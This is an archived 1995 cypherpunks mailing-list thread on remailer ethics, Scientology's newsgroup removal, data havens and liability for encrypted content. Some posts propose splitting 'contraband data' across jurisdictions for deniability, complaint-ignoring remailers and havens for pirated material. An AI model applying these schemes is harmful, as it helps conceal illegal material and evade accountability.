discussion of whether to sell me out or not. Mats From quester at eskimo.com Tue Jan 17 03:01:38 1995 From: quester at eskimo.com (Charles Bell) Date: Tue, 17 Jan 95 03:01:38 PST Subject: Scientologys Attempts In-Reply-To: <9501161644.AA06046@elysion.iaks.ira.uka.de> Message-ID: On Mon, 16 Jan 1995, Hadmut Danisch wrote: > > I just had a view into the alt.religion.scientology and > alt.clearing.technology newsgroups. There are some messages > about a Scientology decision to shut down every internet traffic > about Scientology. If the messages are true, Scientology sent > rmgroup Control messages to remove the groups. > > The request to stop the remailers seems to come from the > same people... > After reading the lawyer's threatening letter I tried to check out the two newsgroups mentioned, and was told they do not exist. (This is not a local filter here; Eskimo does not censor newsgroups.) So have they been deleted? If so, by whom and how? What is 'rmgroup' and who has the authority to remove alt. groups? Charles Bell From danisch at ira.uka.de Tue Jan 17 04:23:00 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 17 Jan 95 04:23:00 PST Subject: Scientologys Attempts Message-ID: <9501171221.AA06681@elysion.iaks.ira.uka.de> > After reading the lawyer's threatening letter I tried to check out the > two newsgroups mentioned, and was told they do not exist. (This is not a > local filter here; Eskimo does not censor newsgroups.) They still exist at our local server (E.I.S.S., University of Karlsruhe, Germany) and contain messages (even from America). Seems as they were successfull in deleting the group at some servers. > So have they been > deleted? If so, by whom and how? Find out... > What is 'rmgroup' and The usenet method to remove groups. A special message with a control line in the header. > who has the > authority to remove alt. groups? Don't know... Hadmut From anonymous-remailer at xs4all.nl Tue Jan 17 06:07:01 1995 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Tue, 17 Jan 95 06:07:01 PST Subject: (none)Re: Abuse and Remailer Ethics In-Reply-To: Message-ID: <199501171405.AA17997@xs1.xs4all.nl> In article , Mats Bergstrom wrote: > > This thread illustrates (at least if setup's like this are > worthy of a place in Raph's list) that penet.fi is the safest > way to go for the moment. I would just hate it to have my > head on the plate of a remailer operator who takes an interest > in subtile ethical discussion of whether to sell me out or not. > > Mats > > This comment is grossly unfair. Obviously Homer is going to a lot of effort to operate his remailer in the best way possible. It's easy for others to be critical. "head on a plate" is a strong term to use, given Homer made it clear he would not reveal the identity of an anonymous user without a court order. Also, one wonders to what end remailers are being put by people who are worried about being "sold out". It's always been a good policy to use a foreign mailer in a chain where anonymity is critically important. That doesn't mean it's OK to make Homer the whipping boy. From ddt at lsd.com Tue Jan 17 06:32:57 1995 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 17 Jan 95 06:32:57 PST Subject: Jude Milhon in WIRED Message-ID: Anyone with any dang sense left at all knows that St. Jude is the secret CypherGoddess behind this whole eff-in' thing, besides being the Patron Saint of Hopeless Causes... ;) dave _________________________________________________________________________ "There are three sides to every issue: my side, your side and the side of the truth." -Babatunde Olatunji From jalicqui at prairienet.org Tue Jan 17 07:46:34 1995 From: jalicqui at prairienet.org (Jeff A Licquia) Date: Tue, 17 Jan 95 07:46:34 PST Subject: Scientologys Attempts In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Charles Bell wrote: > On Mon, 16 Jan 1995, Hadmut Danisch wrote: > > I just had a view into the alt.religion.scientology and > > alt.clearing.technology newsgroups. There are some messages > > about a Scientology decision to shut down every internet traffic > > about Scientology. If the messages are true, Scientology sent > > rmgroup Control messages to remove the groups. > > > > The request to stop the remailers seems to come from the > > same people... > After reading the lawyer's threatening letter I tried to check out the > two newsgroups mentioned, and was told they do not exist. (This is not a > local filter here; Eskimo does not censor newsgroups.) So have they been > deleted? If so, by whom and how? What is 'rmgroup' and who has the > authority to remove alt. groups? An 'rmgroup' is a control message used by Usenet when a group needs to be removed globally. Etiquette suggests that only big, important people should send these out, but technically anyone can send one. I followed the Scientology debate with little interest until yesterday, when I fired up my newsreader and was asked "Subscribe to new group alt.religion.scientology?" At that point, I knew that the real war had begun. :-) >From what I was able to ascertain here, an rmgroup was sent out, followed soon after by a newgroup (or two or three or...). My news server doesn't honor newgroups in the alt hierarchy automatically as a rule, but did so in this case for some reason. News server: news.cso.uiuc.edu, on the University of Illinois Urbana-Champaign campus. ---------------------------------------------------------------------- Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key jalicqui at prairienet.org | Me? Speak for whom? You've got licquia at cei.com (work) | to be kidding! From hroller at metronet.com Tue Jan 17 08:14:44 1995 From: hroller at metronet.com (Michael L. Acklin) Date: Tue, 17 Jan 95 08:14:44 PST Subject: Premail PGP Keys Message-ID: Ralf, I hate to bother you, but I am setting up your premail program and tried the "premail -getkeys" but it never works. I tried to manually finger Matt's Pub Key area, but looks like he is down or has a different address. Is there somewhere else I can try to get the PGP Keys for the remailers, or does Matt have a different address? Any help would really be appreciated. Also does anyone have a patch for PINE 3.9X to get premail to work. I know I am kinda behind but just starting out and would really appreciate any help I can get. Again Thanks in Advance.... Mike Acklin ----------------------> hroller at metronet.com From jamesd at netcom.com Tue Jan 17 09:00:09 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 17 Jan 95 09:00:09 PST Subject: Scientologys Attempts In-Reply-To: <9501171221.AA06681@elysion.iaks.ira.uka.de> Message-ID: On Tue, 17 Jan 1995, Hadmut Danisch wrote: > > > So have they been > > deleted? If so, by whom and how? > > Find out... > > > > What is 'rmgroup' and > > The usenet method to remove groups. A special message > with a control line in the header. > > > who has the > > authority to remove alt. groups? Anybody has the power. Nobody has the authority. It should be done only when there is a general consensus, which is obviously not the case here. This is a classic case of net abuse. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From jya at pipeline.com Tue Jan 17 09:53:02 1995 From: jya at pipeline.com (John Young) Date: Tue, 17 Jan 95 09:53:02 PST Subject: Abuse and Remailer Ethics Message-ID: <199501171752.MAA21698@pipe2.pipeline.com> On Tue, 17 Jan 1995 anonymous-remailer at xs4all.nl (Name withheld on request) said: >This comment is grossly unfair. Obviously Homer is going to a lot of effort to >operate his remailer in the best way possible. > >It's easy for others to be critical. "head on a plate" is a strong term to >use, given Homer made it clear he would not reveal the identity of an anonymous >user without a court order. Also, one wonders to what end remailers are being >put by people who are worried about being "sold out". > >It's always been a good policy to use a foreign mailer in a chain where >anonymity is critically important. That doesn't mean it's OK to make Homer the >whipping boy. I agree that it's a bit much to expect the remailer operator to heroically perform beyond what any of us would do in the same lonely spot under duress. Tim has written recently on another list that the USG grabs enemies in other domains when the national interests are at stake -- the 800-pounder can define any of its actions legal, or to hell with legal niceties as the Beast opts, the picky lawyers can sort it out later, or never. Does not Duncan and others have wisdom on this: Don't roll over out of ignorance and faint-heartedness, but do carefully protect your keister, with feet-on-ground planning, mercury-technology and out-wits. Watch for signs of sneak attack through the guy being squeezed next door, or by a cahoots-machine zipping psy-war toot-alarms to foster fearful quiescence. Some warning examples may be in the offing in the rising heat of dreaded horse-threats to civil society. If so, some will be arranged by provocateurs like past G-guy tricks. So it goes. So what. Nesta said, it's fun to lance swollen infected over-controlling heads. From jamesd at netcom.com Tue Jan 17 10:27:45 1995 From: jamesd at netcom.com (James A. Donald) Date: Tue, 17 Jan 95 10:27:45 PST Subject: Scientology and remailers. Message-ID: Posting the truth about Scientology, in the face of harassment and threats by scientologists, is an excellent example of the legitimate use of remailers, as is alt.abuse.recovery, and talk.politics.china --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From jrochkin at cs.oberlin.edu Tue Jan 17 10:48:34 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 17 Jan 95 10:48:34 PST Subject: Abuse and Remailer Ethics Message-ID: >This thread illustrates (at least if setup's like this are >worthy of a place in Raph's list) that penet.fi is the safest >way to go for the moment. I would just hate it to have my >head on the plate of a remailer operator who takes an interest >in subtile ethical discussion of whether to sell me out or not. If you chain it through 3 or 4 remailers with PGP, then pretty much all 3 or 4 of them have got to decide to sell you out. I trust Julf a lot, but I'm not sure I trust him four times as much as much as every other remailer operator. Or something like that. You can also probably use penet as a link on your larger chain, although I've never tried this to see how it works. And I would note that the "subtle ethical discussion" seemed to consist of the operator trying to figure out what he should do in the future about this sort of thing, and he never even seemed to consider turning over the name of the anon user. Although he did acknowledge that in the future he might, or might work with other operators to try and discover a True Name. *shrug* From asgaard at sos.sll.se Tue Jan 17 11:13:11 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 11:13:11 PST Subject: (none) In-Reply-To: <199501171405.AA17997@xs1.xs4all.nl> Message-ID: On Tue, 17 Jan 1995, Name withheld on request wrote: > wonders to what end remailers are being put by people who are worried > about being "sold out". The fundamental principle here is that an e-mail message is just so many bits of 1's and 0's. It can never, in it's own capacity, steal, molest or kill. It is therefore not unethical to run a no-log 'fortress remailer' and auto-delete ALL complaints, without exception. It might not be feasible to do so if one wants to stay out of jail, but hope- fully this will change with the rapid increase in country domains and the soon-to-come digicash market. Discussions of programming to make fortress remailers work and to make them easily exportable to African Linux-boxes are interesting. So are discussions of expected repercussions on society. Ethical discussions of what is abuse or not are better left to the clergy. Mats From asgaard at sos.sll.se Tue Jan 17 11:50:55 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Tue, 17 Jan 95 11:50:55 PST Subject: remailer security In-Reply-To: Message-ID: > If you chain it through 3 or 4 remailers with PGP, then pretty much all 3 > or 4 of them have got to decide to sell you out. I trust Julf a lot, but > I'm not sure I trust him four times as much as every other remailer > operator. Or something like that. I am familiar with this argument and agree. In the discussed case the alleged abuser had only used one remailer (on a site that keeps logs world readable at that!). Laziness, I guess. There are ways of multiple chaining for the lazy, though: C2 lets you pick the chained sites by clicking on a web-page (but does it encrypt??). Mats From jalicqui at prairienet.org Tue Jan 17 12:27:23 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Tue, 17 Jan 95 12:27:23 PST Subject: (none) Message-ID: <9501172027.AA24378@firefly.prairienet.org> Mats Bergstrom wrote: >On Tue, 17 Jan 1995, Name withheld on request wrote: > >> wonders to what end remailers are being put by people who are worried >> about being "sold out". > >The fundamental principle here is that an e-mail message is just so >many bits of 1's and 0's. It can never, in it's own capacity, steal, >molest or kill. It is therefore not unethical to run a no-log 'fortress >remailer' and auto-delete ALL complaints, without exception. It might >not be feasible to do so if one wants to stay out of jail, but hope- >fully this will change with the rapid increase in country domains >and the soon-to-come digicash market. Discussions of programming to >make fortress remailers work and to make them easily exportable to >African Linux-boxes are interesting. So are discussions of expected >repercussions on society. Ethical discussions of what is abuse or not >are better left to the clergy. Here comes the clergy! :-) I'm sure that when your hypothetical remailer comes up and I decide to spam you with your own words (now I wouldn't do that, now would I? ;-), your sysadmin will be comforted by knowing that it's only ones and zeros filling his hard disk. He would be especially comforted if I spammed postmaster at wherever.you.are rather than your own account in a move to protect your own anonymity. Advocating a remailer such as you describe is only possible in a world where anonymity is considered the supreme good, a goal to achieve no matter how many other ethical rules we break. In the real world, however, there will always be problems with "acceptable use" and "abuse", along with the additional problems with establishing policy and so on. From beattie at CSOS.ORST.EDU Tue Jan 17 12:28:42 1995 From: beattie at CSOS.ORST.EDU (Brian Beattie) Date: Tue, 17 Jan 95 12:28:42 PST Subject: (none) In-Reply-To: Message-ID: On Tue, 17 Jan 1995, Mats Bergstrom wrote: > On Tue, 17 Jan 1995, Name withheld on request wrote: > > > wonders to what end remailers are being put by people who are worried > > about being "sold out". > > The fundamental principle here is that an e-mail message is just so > many bits of 1's and 0's. It can never, in it's own capacity, steal, I disagree, one can use e-mail to steal. E-mail consumes resources, resources for which the sender may have no right to use. If the sender is sending messages which the recipient does not wish to receive then his resources are being taken. If the recipient has now way of stopping the messages then the recipients resources are being taken against the recipient's will and the recipient should be able to have the messages stopped before they consume the recipients resources. Brian Beattie | [From an MIT job ad] "Applicants must also have | extensive knowledge of UNIX, although they should beattie at csos.orst.edu | have sufficently good programming taste to not Fax (503)754-3406 | consider this an achievement." From bdolan at use.usit.net Tue Jan 17 12:33:02 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Tue, 17 Jan 95 12:33:02 PST Subject: Internet News: NNBC News Story moved to tonight (Tuesday) (fwd) Message-ID: ---------- Forwarded message ---------- Date: Tue, 17 Jan 1995 14:23:11 -0500 From: Craig Peterson To: Multiple recipients of list Subject: INFO: NBC Nightly News Story moved to tonight (Tuesday) A story regarding the Internet, with some sort of mention of NRA.org, should be on the NBC Nightly News with Tom Brokaw tonight. Craig. From rfb at lehman.com Tue Jan 17 12:35:13 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Tue, 17 Jan 95 12:35:13 PST Subject: Abuse and Remailer Ethics In-Reply-To: Message-ID: <9501172032.AA29703@cfdevx1.lehman.com> Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET) From: Mats Bergstrom This thread illustrates (at least if setup's like this are worthy of a place in Raph's list) that penet.fi is the safest way to go for the moment. That depends on your threat model. For most, chaining is safer than penet. I would just hate it to have my head on the plate of a remailer operator who takes an interest in subtile ethical discussion of whether to sell me out or not. Your characterization of what Homer has said strikes me as extremely inaccurate. Rick From unicorn at access.digex.net Tue Jan 17 12:39:06 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 17 Jan 95 12:39:06 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: On Mon, 16 Jan 1995, Johnathan Corgan wrote: > Date: Mon, 16 Jan 95 18:14:26 PST > From: Johnathan Corgan > To: Robert Rothenberg , > Black Unicorn > Cc: cypherpunks at toad.com > Subject: Re: Another problem w/Data Havens... > > -----BEGIN PGP SIGNED MESSAGE----- > > >Data havens that can split data to two or more locations in seperate > >jurisdictions can effectively ignore attention from authorities not > >related to the site management or site preformance. Encryption mandated > >sites can also take this stance, while encryption is legal in any event. > > It just occurred to me when reading this another method for ensuring the > "I can't tell what's in it" condition with a data haven operator. Why not > use a secret sharing system where the contraband data is split into a number > of pieces and sent to different havens? It could be argued that the individual > pieces are not the same as the whole, and there is absolutely no way the > operator could recover the original from a given piece (thus providing > plausible deniability.) > > Using M by N secret sharing, with M < N, you build in some redundancy in case > one of the havens gets shutdown. This was essentially my point, phrased much more precisely. I believe this has been suggested, even discussed at length before on the list. Just from a structure standpoint, the haven could segment the data, use some sort of encryption, and then send an encrypted message containing the "resegmenting key." Theoretically the haven would destroy the resegmenting key after generating it and sending it, leaving the original sender with the only copy. Trust in the data haven operator is bolstered by his or her interest in not knowing the contents of the data, or the retrevial key for the data, less he or she be vulnerable to authority scrutiny. > == > Johnathan Corgan "Violence is the last refuge of the incompetent." > jcorgan at scruznet.com -Isaac Asimov -uni- (Dark) -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Tue Jan 17 12:49:59 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 17 Jan 95 12:49:59 PST Subject: Another problem w/Data Havens... In-Reply-To: <9501170829.AA10034@anchor.ho.att.com> Message-ID: On Tue, 17 Jan 1995 wcs at anchor.ho.att.com wrote: > Date: Tue, 17 Jan 95 03:29:17 EST > From: wcs at anchor.ho.att.com > To: grendel at netaxs.com > Cc: cypherpunks at toad.com > Subject: Re: Another problem w/Data Havens... > > > Liability is a legal issue, not a technical one. > (Catchability is a technical issue.) BING! > > Alice asks Dave's Data Haven to store stuff, and later retrieves it. > Dave doesn't want to be able to know what's in it. > There are three main threat periods - at receipt of the data, > during storage, and at retrieval. Secret sharing is great for > the storage period, assuming the data havens are in different > jurisdictions and the cops can't force the operator (Dave) > to go retrieve all the pieces. > > However, at receipt of the data, it's all in one place, Dave's inbox. > If Alice encrypted it safely, or secret-shared it herself, great! > But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime, > or Alice's key has been compromised, anything in Dave's inbox is > still toast, even if anything that's been split and stored is safer > than if it had been stored unsplit. So he either needs to split it fast, > shortening the window, or find a way to blind his mail before processing it, > or split it before reading it. I found this very insightful. All the more reason to mandate encryption, or to encrypt all plaintext on arrival. > > Splitting before reading isn't impossible in a stream environment. > Define a protocol that looks like SMTP, but opens up three outgoing > streams as well as an incoming stream, and uses standard mail formats. > While reading the headers from Alice (either the real contents or just the > handshakes at the beginning), Dave's receiver thinks about them > and sends some meaningful headers to Moe, Larry, and Curly. > Once the message body starts, instead of storing the incoming bytes, > Dave sends every other byte to Moe or Larry, and the xors to Curly.* > If he wants to get fancy, he can even encrypt the data with a stream > cypher as he goes along, giving half the key to each of them. > That way, Dave's system really only has knowledge of the headers, > plus one line at a time of incriminating data on the fly. > And his partners can't give anything away either; they're just stooges. > > * If the connections to and storage by Moe and Larry are reliable enough, > Curly doesn't really need to be involved, but the xor business lets > you reconstruct everything from just two parts. I like the pure elegance of this solution. Are there implemented DH codes running around anywhere? > > > Bill > > "Privacy is not a crime!" > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From cactus at seabsd.hks.net Tue Jan 17 13:14:09 1995 From: cactus at seabsd.hks.net (Gone Fission) Date: Tue, 17 Jan 95 13:14:09 PST Subject: Abuse and Remailer Ethics Message-ID: <199501172119.QAA09578@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article , Homer Wilson Smith wrote: > I am not presently on cypherpunks, so please include me in the >replies. It's a little (not a lot) rude to start a substantive conversation and not to listen in to the list for duration. Just my O. > Does a list owner have the right to demand blocking to his list, >with or without a vote of the list readers? I would say yes. And the power. They can filter them out at the level of the mailing address. Tell 'em to do their own work. Put it gently and politely, but if they're the list admin, they can easily filter out mail from specific addresses without bugging a busy remailer operator who is, after all, doing a service to the net much as the list admin is. "Scenario them rosily with a calculated ambiguity which they will be sure to understand." - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxv4hRNhgovrPB7dAQFBbwP/XCzg7Zyib0ZXPDPpv/0QKR+jKYCchJ+r bcIfM4g+rP1uxyuBj1ErLhvc18Dpu/zjp5u2ZR5F9L6OYEF6YrYrUhgq1hsTNc1U lHZsCNr8ZuOpfU/dLAeLvrZLNak39eVmoMnInSNO0q7dUoMnaKz8CjZAQvy+TK4A eqle4P9fmSM= =4z27 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxw0MioZzwIn1bdtAQGx2AF/WUf23vWGlV6WXUfQ2BBYuEodnnUvN5GM hYLbdgZ7BO6NWpgbLSPQYCs2X4yWMqVW =m+km -----END PGP SIGNATURE----- From habs at cmyk.warwick.com Tue Jan 17 13:22:51 1995 From: habs at cmyk.warwick.com (Harry S. Hawk) Date: Tue, 17 Jan 95 13:22:51 PST Subject: A Reason for Privacy Message-ID: <9501180022.AA08869@cmyk.warwick.com> Hi, I had a talk today with our Office Manager which reveals an other reason why we need anon. system. That is to say a good reason we can hold up to the press, media and other people.. The Example: Job Ads.. This are often non on an Anon. basis. For example, the new york times will function as an anon. forwarder of job resumes... The office manager needs to have both the company name and the name of the person getting the resumes to be kept anonymous... From eric at remailer.net Tue Jan 17 13:28:41 1995 From: eric at remailer.net (Eric Hughes) Date: Tue, 17 Jan 95 13:28:41 PST Subject: Does encrypted equal safe? In-Reply-To: Message-ID: <199501172128.NAA06955@largo.remailer.net> From: marko at millcomm.com (Mark Oeltjenbruns) >If you can't read it, it's not kiddie-porn *for you*, although it >might be for someone with the key. > So the fact that its not kiddie-porn *for me* makes it safe *for me* to be transporting or storing for others that know it is kiddie-porn? Do you want it to be, or not? This is exactly the situation I was talking about when I emphasized the need for a positive rhetoric. We have here a situation for which I see the need for a clear statement of position and persuasive arguments in its favor. The law gets created by discussion. If we as a group fail to articulate our positions, these positions won't be represented and, failing other advocates (who?), will have no place in the law. Legal support of privacy technology will be necessary for its long term acceptance. The structure of the argument quoted below is primarily that of "this can't be right". I can only infer advocacy that operators of privacy services must be primarily responsible for content. This is to say one of several things, none of which I desire. It is to say privacy service operators who don't know content and who don't know identity should not exist, because no sane person would take upon themselves the liability of the world. It is alternately to say that privacy service operators must know content and filter it. It is alternately to say that such operators must know identity and be able to transfer liability, and these last two are not mutually exclusive. If you don't want this situation, speak up now. I desire the approved existence of privacy services which offer true privacy and as completely ignorant as possible operators of them. >Encryption fragments meaning subjectively. A magazine, for example, >has a fixed center of meaning for all who can read the language. A >magazine looks the same to all who look at it. An encrypted file >looks different to those who have the key from those who do not. But why does the meaning of the data assume to change? Because I want it to. Meaning is subjective. If I see encrypted text, am I to be held responsible for having seen through an encryption for which I hold not the key? Merely because someone knows a transformation into a disapproved form does not mean that I do. If I take my stack of kiddie-porn and put it in a box with a big strong lock on it, in a way physically encrypting it, change the meaning of what I have? Ask your local postal or parcel service. Is your local letter carrier responsible for the possession of kiddie porn while walking around with the mail in their sack? I certainly hope not. That would be a ludicrous situation. More accurately, it would be an outrage. Pushing responsiblity for interpretation, the ascertaining of meaning, onto people who transport and store either physical goods or information would be to require them to become deputies in enforcement. The policeman inside indeed! No one is required to love the State nor its dictates. >Encrypted data is fundamentally different from paper-and-ink data in >this way. The metaphor of "planting it on somebody" does not apply to >data that the "somebody" can't read. It is fundamentally a different process, but does that make it different from the locking the physical data in a box as above? It is identical in its removal of any knowledge of content from the state of mind of the holder. What is different is that encrypted data is even more clear in its removal of knowledge. With a physical container, the boundary of the container can be breached. With a crypto container, it is impossible. It seems to me that what you are saying is that because the data is in a form that I can't understand, I'm safe from trouble. Now it seems to me that this is not all that different from changing the form or appearence of physical data and saying I'm not responsible for it. If you personally enclose a physical object, you haven't removed your own state of knowledge about the contents. But if you give the package to someone else, they don't know the contents. Even when the package changes hands, the state of knowledge doesn't. The War on Certain Drugs has had the unfortunate effect of stretching the imputations of knowledge to holders of Certain Drugs. If a single person denies a state of knowledge, yet has physical possession of some Certain Drug, a court may assume that the possessor is lying. And the fact that certain situations like this have been legislated badly makes them no less totalitarian. On the other hand, someone in the business of taking packages from many different people can reasonably argue that they have no specific knowledge of the contents of any of them. Now think of a remailer: If somebody gave me this box of stuff, stuff that I had no idea of what it was since it was *locked up*, to transport over to location X and I got busted half way there am I safe? I'll consider this a reasonable argument if you can show that some analogous delivery service has been busted in this way. And not all delivery services are common carriers. Can I say that even though someone is using me to spam or distribute kiddie porn, I have no reason to try and stop it since I don't know what they are doing? I can tell from this situation that you yourself wouldn't not feel comfortable running a remailer. So don't do that. I see you're already not doing that; good. Eric From eric at remailer.net Tue Jan 17 13:30:48 1995 From: eric at remailer.net (Eric Hughes) Date: Tue, 17 Jan 95 13:30:48 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: <199501172130.NAA06966@largo.remailer.net> From: Johnathan Corgan It just occurred to me when reading this another method for ensuring the "I can't tell what's in it" condition with a data haven operator. Why not use a secret sharing system where the contraband data is split into a number of pieces and sent to different havens? [...] Ok, Eric, go ahead and blast your holes in this argument :) How do you know that what you the operator of the storage service gets was generated by secret sharing? The suggestion of having certificates that say "I encrypted this" are interesting, but merely transfer the problem onto that signer. Eric From rah at shipwright.com Tue Jan 17 13:52:20 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 17 Jan 95 13:52:20 PST Subject: Netscape & future developments Message-ID: > >Date: Tue, 17 Jan 1995 10:42:50 -0800 >From: wbarr at leland.stanford.edu (William P. Barr) >To: apple-internet-providers at medraut.apple.com >Subject: Netscape & future developments >Message-ID: > >Hello All, > >I just attended a talk given by Marc Andreessen, co-founder of Netscape, >and he had several interesting things to say that you all might be >interested in. > >First off, Netscape plans to make the API to it's browser available to 3rd >party developers in the near future. With a list of over 1300 things users >want added to the browser, he believes that other developers will be much >more effective at filling the demand. Could this move spawn the "Visual >Basic" of the internet? Perhaps ... > >Second, Netscape has formed some key partnerships. Most notably, DEC and >Sun will be redistributing Netscape server software through its channels. >It has also created an alliance with Bank Of America and Mastercard for >secured cash transactions. Netscape is also providing all the servers for >MCI's www services. > >Third, he said that by the end of this year, secured transactions will no >longer be rare. Currently the model of a transaction is: > > Customer ---> Merchant ---> Card Issuer > >The new model will be: > > Customer ---> Card Issuer ---> Merchant > >This new model requires that you only have to trust your card issuer and >the communications link from your machine to theirs. The Card Issuer will >then verify the credit and notify the merchant of the validity of the >purchase. There are two major ramifications: First, you no longer have to >worry about the integrity of the merchant; second, this will allow card >issuers to change the rules for giving merchant status to businesses. Marc >predicted that by the end of the year, getting merchant status from several >major card issuing banks will greatly simiplified, allowing dozens of >businesses/services to spring up on the net, almost overnight. > >Finally, he said that the company is in the process of settling on a >distributor to get the browser into the retail store-fronts. > >If you have any more questions, just ask. > >Bill > >********************************************* >*William P. Barr (415) 723-6632 (work)* >*Multimedia Coordinator (415) 725-7398 (fax) * >*Stanford Computer Forum >* >*ERL 448/450 wbarr at cs.stanford.edu (business)* >*Stanford, CA, 94305-4055 wbarr at leland.stanford.edu (leisure)* >*USA "My opinion is mine and only mine* >********************************************* > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From jackr at dblues.engr.sgi.com Tue Jan 17 14:20:54 1995 From: jackr at dblues.engr.sgi.com (Jack Repenning) Date: Tue, 17 Jan 95 14:20:54 PST Subject: pgp.el, as shown at the last PhysMeet Message-ID: <12096.790381237@dblues.engr.sgi.com> At this weekend's Physical Meeting, I demonstrated pgp.el, an interface to PGP for use from GNU Emacs. As I mentioned, this package is available from the standard Emacs lisp archives and other places. However, the version I showed is advanced beyond those sites, most notably in the use of color to highlight various PGP messages, and in the "transparent decryption" feature that I talked about the most. If you'd like to look over this latest version, you can snarf it from: ftp.sgi.com:private/pgp-el.tar.gz This version is still under test and development (notably, I want to get the transparency working for rmail as well as mh-e, and for sending as well as receiving). Because it's not finished yet, I've put it in the private/ directory, which is protected against browsing. When that's all finished, I'll be publishing it again in the usual places. From rishab at dxm.ernet.in Tue Jan 17 14:26:48 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Tue, 17 Jan 95 14:26:48 PST Subject: Jude Milhon in WIRED In-Reply-To: <9501160118.AA05350@snark.imsi.com> Message-ID: "Perry E. Metzger" writes: > rishab at dxm.ernet.in says: > > WIRED 3.02 (February) interviews Jude Milhon (St. Jude) who "is a charter > > member of the cypherpunks - a term that she coined." I didn't even know the > > _was_ a charter. > > Or a Jude Milhon, for that matter. Another example of the continuing > decay of a once proud magazine... Though I don't recall seeing her post to the list, I'll borrow Tim's words from the Cyphernomicon: 2.4.10. "Where did the name 'Cypherpunks' come from?" + Jude Milhon, aka St. Jude, then an editor at "Mondo 2000," was at the earliest meetings...she quipped "You guys are just a bunch of cypherpunks." The name was adopted immediately. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Tue Jan 17 14:26:56 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 17 Jan 95 14:26:56 PST Subject: Known data havens for pirates? Doubtful Message-ID: I forget who wrote: > blame them. Copyrighted data on a server in a jurisdiction that > doesn't acknowledege the copyrights - a prime use for Data Havens > when they come of age. I suppose you _are_ aware that the US has threatened China with punitive duties on $100 BILLION dollars worth of trade, and that China has started holding some show trials (without shutting down its state-owned CD-piracy factories). It's not going to be easy to find a country more willing and able to ignore international copyright law (Berne Convention etc) than China; however, despite howls of protest even China is likely to knuckle down eventually. What may be likely is distributed piracy markets, such as described in Tim's BlackNet spoof. Read my earlier post on what Lance Rose thinks. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From kipp at warp.mcom.com Tue Jan 17 14:42:53 1995 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Tue, 17 Jan 95 14:42:53 PST Subject: 40bit Encryption : Adequate or sadly lacking ? Message-ID: <9501172240.AA05908@warp.mcom.com> In article <3fh5m0$7tg at hdxu03.telecom.ptt.nl>, you write: > In article , marca at mcom.com > says... > > > >There's no question that 40-bit is less than one would prefer. > >This is why we are/will be supporting 128-bit RC4, for example, > >in US-only products, honoring United States government export > >restrictions. > > Marc, isn't it possible (legally) to deliver products with a replaceble > encryption library (dll). Delivery with a 40-bit key DLL. The user has > the option to install a dll with a different keysize. Somewhat like > winsock... > > Yes, I've seen the article suggesting a foreign office. I think an open > interface would do gooed for the whole field. I.e. ftp, telnet, etc. as > well. Actually, it's probably worse than you think: There are govt's out there that won't let you import code that is "encryption ready". You must prove that your software is tamper proof before it can be imported, and tamper proofing means that you can't bolt on security. Also, I believe the export laws disallow "plug in" security in the US... The crypto legal world sucks. From rishab at dxm.ernet.in Tue Jan 17 14:54:15 1995 From: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) Date: Tue, 17 Jan 95 14:54:15 PST Subject: Jude Milhon in WIRED In-Reply-To: <199501160356.TAA09359@netcom2.netcom.com> Message-ID: 